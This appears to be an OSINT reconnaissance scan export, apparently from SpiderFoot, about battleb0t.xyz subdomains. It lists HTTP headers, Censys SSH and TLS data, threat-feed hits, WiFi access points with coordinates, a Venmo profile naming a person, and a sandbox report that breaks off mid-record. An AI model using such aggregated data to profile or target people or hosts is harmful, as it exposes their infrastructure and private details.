d(e){e.style.background="",e.style.cssText+="background: -moz-linear-gradient(top, #ff0000 0%, #ff00ff 17%, #0000ff 34%, #00ffff 50%, #00ff00 67%, #ffff00 84%, #ff0000 100%);",e.style.cssText+="background: -webkit-linear-gradient(top, #ff0000 0%,#ff00ff 17%,#0000ff 34%,#00ffff 50%,#00ff00 67%,#ffff00 84%,#ff0000 100%);",e.style.cssText+="background: -o-linear-gradient(top, #ff0000 0%,#ff00ff 17%,#0000ff 34%,#00ffff 50%,#00ff00 67%,#ffff00 84%,#ff0000 100%);",e.style.cssText+="background: -ms-linear-gradient(top, #ff0000 0%,#ff00ff 17%,#0000ff 34%,#00ffff 50%,#00ff00 67%,#ffff00 84%,#ff0000 100%);",e.style.cssText+="background: linear-gradient(top, #ff0000 0%,#ff00ff 17%,#0000ff 34%,#00ffff 50%,#00ff00 67%,#ffff00 84%,#ff0000 100%);"}function c(e,t,n){var o=document.createElement("li");return t&&o.appendChild(t),n?e.__ul.insertBefore(o,n):e.__ul.appendChild(o),e.onResize(),o}function u(e){X.unbind(window,"resize",e.__resizeHandler),e.saveToLocalStorageIfPossible&&X.unbind(window,"unload",e.saveToLocalStorageIfPossible)}function _(e,t){var n=e.__preset_select[e.__preset_select.selectedIndex];n.innerHTML=t?n.value+"*":n.value}function h(e,t,n){if(n.__li=t,n.__gui=e,S.extend(n,{options:function(t){if(arguments.length>1){var o=n.__li.nextElementSibling;return n.remove(),f(e,n.object,n.property,{before:o,factoryArgs:[S.toArray(arguments)]})}if(S.isArray(t)||S.isObject(t)){var i=n.__li.nextElementSibling;return n.remove(),f(e,n.object,n.property,{before:i,factoryArgs:[t]})}},name:function(e){return n.__li.firstElementChild.firstElementChild.innerHTML=e,n},listen:function(){return n.__gui.listen(n),n},remove:function(){return n.__gui.remove(n),n}}),n instanceof q){var o=new Q(n.object,n.property,{min:n.__min,max:n.__max,step:n.__step});S.each(["updateDisplay","onChange","onFinishChange","step"],function(e){var t=n[e],i=o[e];n[e]=o[e]=function(){var e=Array.prototype.slice.call(arguments);return i.apply(o,e),t.apply(n,e)}}),X.addClass(t,"has-slider"),n.domElement.insertBefore(o.domElement,n.domElement.firstElementChild)}else if(n instanceof Q){var i=function(t){if(S.isNumber(n.__min)&&S.isNumber(n.__max)){var o=n.__li.firstElementChild.firstElementChild.innerHTML,i=n.__gui.__listening.indexOf(n)>-1;n.remove();var r=f(e,n.object,n.property,{before:n.__li.nextElementSibling,factoryArgs:[n.__min,n.__max,n.__step]});return r.name(o),i&&r.listen(),r}return t};n.min=S.compose(i,n.min),n.max=S.compose(i,n.max)}else n instanceof K?(X.bind(t,"click",function(){X.fakeEvent(n.__checkbox,"click")}),X.bind(n.__checkbox,"click",function(e){e.stopPropagation()})):n instanceof Z?(X.bind(t,"click",function(){X.fakeEvent(n.__button,"click")}),X.bind(t,"mouseover",function(){X.addClass(n.__button,"hover")}),X.bind(t,"mouseout",function(){X.removeClass(n.__button,"hover")})):n instanceof $&&(X.addClass(t,"color"),n.updateDisplay=S.compose(function(e){return t.style.borderLeftColor=n.__color.toString(),e},n.updateDisplay),n.updateDisplay());n.setValue=S.compose(function(t){return e.getRoot().__preset_select&&n.isModified()&&_(e.getRoot(),!0),t},n.setValue)}function p(e,t){var n=e.getRoot(),o=n.__rememberedObjects.indexOf(t.object);if(-1!==o){var i=n.__rememberedObjectIndecesToControllers[o];if(void 0===i&&(i={},n.__rememberedObjectIndecesToControllers[o]=i),i[t.property]=t,n.load&&n.load.remembered){var r=n.load.remembered,s=void 0;if(r[e.preset])s=r[e.preset];else{if(!r[se])return;s=r[se]}if(s[o]&&void 0!==s[o][t.property]){var a=s[o][t.property];t.initialValue=a,t.setValue(a)}}}}function f(e,t,n,o){if(void 0===t[n])throw new Error('Object "'+t+'" has no property "'+n+'"');var i=void 0;if(o.color)i=new $(t,n);else{var r=[t,n].concat(o.factoryArgs);i=ne.apply(e,r)}o.before instanceof z&&(o.before=o.before.__li),p(e,i),X.addClass(i.domElement,"c");var s=document.createElement("span");X.addClass(s,"property-name"),s.innerHTML=i.property;var a=document.createElement("div");a.appendChild(s),a.appendChild(i.domElement);var l=c(e,a,o.before);return X.addClass(l,he.CLASS_CONTROLLER_ROW),i instanceof $?X.addClass(l,"color"):X.addClass(l,H(i.getValue())),h(e,l,i),e.__controllers.push(i),i}function m(e,t){return document.location.href+"."+t}function g(e,t,n){var o=document.createElement("option");o.innerHTML=t,o.value=t,e.__preset_select.appendChild(o),n&&(e.__preset_select.selectedIndex=e.__preset_select.length-1)}function b(e,t){t.style.display=e.useLocalStorage?"block":"none"}function v(e){var t=e.__save_row=document.createElement("li");X.addClass(e.domElement,"has-save"),e.__ul.insertBefore(t,e.__ul.firstChild),X.addClass(t,"save-row");var n=document.createElement("span");n.innerHTML=" ",X.addClass(n,"button gears");var o=document.createElement("span");o.innerHTML="Save",X.addClass(o,"button"),X.addClass(o,"save");var i=document.createElement("span");i.innerHTML="New",X.addClass(i,"button"),X.addClass(i,"save-as");var r=document.createElement("span");r.innerHTML="Revert",X.addClass(r,"button"),X.addClass(r,"revert");var s=e.__preset_select=document.createElement("select");if(e.load&&e.load.remembered?S.each(e.load.remembered,function(t,n){g(e,n,n===e.preset)}):g(e,se,!1),X.bind(s,"change",function(){for(var t=0;t<e.__preset_select.length;t++)e.__preset_select[t].innerHTML=e.__preset_select[t].value;e.preset=this.value}),t.appendChild(s),t.appendChild(n),t.appendChild(o),t.appendChild(i),t.appendChild(r),ae){var a=document.getElementById("dg-local-explain"),l=document.getElementById("dg-local-storage");document.getElementById("dg-save-locally").style.display="block","true"===localStorage.getItem(m(e,"isLocal"))&&l.setAttribute("checked","checked"),b(e,a),X.bind(l,"change",function(){e.useLocalStorage=!e.useLocalStorage,b(e,a)})}var d=document.getElementById("dg-new-constructor");X.bind(d,"keydown",function(e){!e.metaKey||67!==e.which&&67!==e.keyCode||le.hide()}),X.bind(n,"click",function(){d.innerHTML=JSON.stringify(e.getSaveObject(),void 0,2),le.show(),d.focus(),d.select()}),X.bind(o,"click",function(){e.save()}),X.bind(i,"click",function(){var t=prompt("Enter a new preset name.");t&&e.saveAs(t)}),X.bind(r,"click",function(){e.revert()})}function y(e){function t(t){return t.preventDefault(),e.width+=i-t.clientX,e.onResize(),i=t.clientX,!1}function n(){X.removeClass(e.__closeButton,he.CLASS_DRAG),X.unbind(window,"mousemove",t),X.unbind(window,"mouseup",n)}function o(o){return o.preventDefault(),i=o.clientX,X.addClass(e.__closeButton,he.CLASS_DRAG),X.bind(window,"mousemove",t),X.bind(window,"mouseup",n),!1}var i=void 0;e.__resize_handle=document.createElement("div"),S.extend(e.__resize_handle.style,{width:"6px",marginLeft:"-3px",height:"200px",cursor:"ew-resize",position:"absolute"}),X.bind(e.__resize_handle,"mousedown",o),X.bind(e.__closeButton,"mousedown",o),e.domElement.insertBefore(e.__resize_handle,e.domElement.firstElementChild)}function w(e,t){e.domElement.style.width=t+"px",e.__save_row&&e.autoPlace&&(e.__save_row.style.width=t+"px"),e.__closeButton&&(e.__closeButton.style.width=t+"px")}function x(e,t){var n={};return S.each(e.__rememberedObjects,function(o,i){var r={},s=e.__rememberedObjectIndecesToControllers[i];S.each(s,function(e,n){r[n]=t?e.initialValue:e.getValue()}),n[i]=r}),n}function E(e){for(var t=0;t<e.__preset_select.length;t++)e.__preset_select[t].value===e.preset&&(e.__preset_select.selectedIndex=t)}function C(e){0!==e.length&&oe.call(window,function(){C(e)}),S.each(e,function(e){e.updateDisplay()})}var A=Array.prototype.forEach,k=Array.prototype.slice,S={BREAK:{},extend:function(e){return this.each(k.call(arguments,1),function(t){(this.isObject(t)?Object.keys(t):[]).forEach(function(n){this.isUndefined(t[n])||(e[n]=t[n])}.bind(this))},this),e},defaults:function(e){return this.each(k.call(arguments,1),function(t){(this.isObject(t)?Object.keys(t):[]).forEach(function(n){this.isUndefined(e[n])&&(e[n]=t[n])}.bind(this))},this),e},compose:function(){var e=k.call(arguments);return function(){for(var t=k.call(arguments),n=e.length-1;n>=0;n--)t=[e[n].apply | https://oldfluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 02:44:47 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 3 | 0 | None | HSTS | panel.battleb0t.xyz |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-001-0.github.io]
https://www.openphish.com/feed.txt | 0-001-0.github.io |
| 2023-05-12 02:54:20 | HTTP Headers | No | Web Spider | 2 | 0 | 4 | 0 | None | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:20 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:20 GMT", "cf-ray": "7c5f605fb97f4259-EWR", "content-type": "text/css", "x-frame-options": "DENY"} | http://nuke.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 03:00:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.1): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:26 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | zlib@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 02:44:21 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | United States | 185.199.111.153 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | DevOps - DevOps is a methodology in the software development and IT industry. Used as a set of practices and tools, DevOps integrates and automates the work of software development and IT operations as a means for improving and shortening the systems development life cycle. | battleb0t.github.io |
| 2023-05-12 02:54:51 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H06V19Y9J57EVG1E6053DPH4"], "Server": ["Netlify"]} | 34.74.170.74 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom1330 (Net ID: 00:01:38:92:E5:07) | 37.780462,-122.390564 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c56db576d8c1409-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:01:24 | Web Server | No | Tool - WhatWeb | 0 | 0 | 1 | 0 | None | cloudflare | ayhu.xyz |
| 2023-05-12 03:01:13 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.128): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:11 | Raw Data from RIRs | No | Venmo | 0 | 0 | 6 | 0 | None | {u'username': u'login', u'first_name': u'baptiste', u'last_name': u'vauthey', u'display_name': u'baptiste vauthey', u'identity_type': u'personal', u'profile_picture_url': u'https://s3.amazonaws.com/venmo/no-image.gif', u'id': u'1987457377632256359', u'date_joined': u'2016'} | login |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | figma (Category: tech)
https://www.figma.com/@login | login |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.92): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys-a (Net ID: 00:0C:41:0B:AB:D7) | 39.0469, -77.4903 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.201): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:24:33 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 4 | 0 | None | VXVault Malicious URL List [cdn-185-199-109-154.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-109-154.github.com |
| 2023-05-12 03:32:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.10:8080 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | speedstream (Net ID: 00:01:24:F1:A9:A3) | 34.0544, -118.244 |
| 2023-05-12 02:44:16 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.111.153 |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | oldfluid.battleb0t.xyz | [{"url": "https://oldfluid.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://oldfluid.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:24:22 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html | https://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ASI (Net ID: 00:02:6F:51:19:D9) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:53:57 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://wasimreja.me/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e74_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e74_IESQMMUTEX_0_519"\n "IsoScope_e74_ConnHashTable<3700>_HashTable_Mutex"\n "IsoScope_e74_IESQMMUTEX_0_331"\n "IsoScope_e74_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3700"\n "IsoScope_e74_IE_EarlyTabStart_0xd58_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n 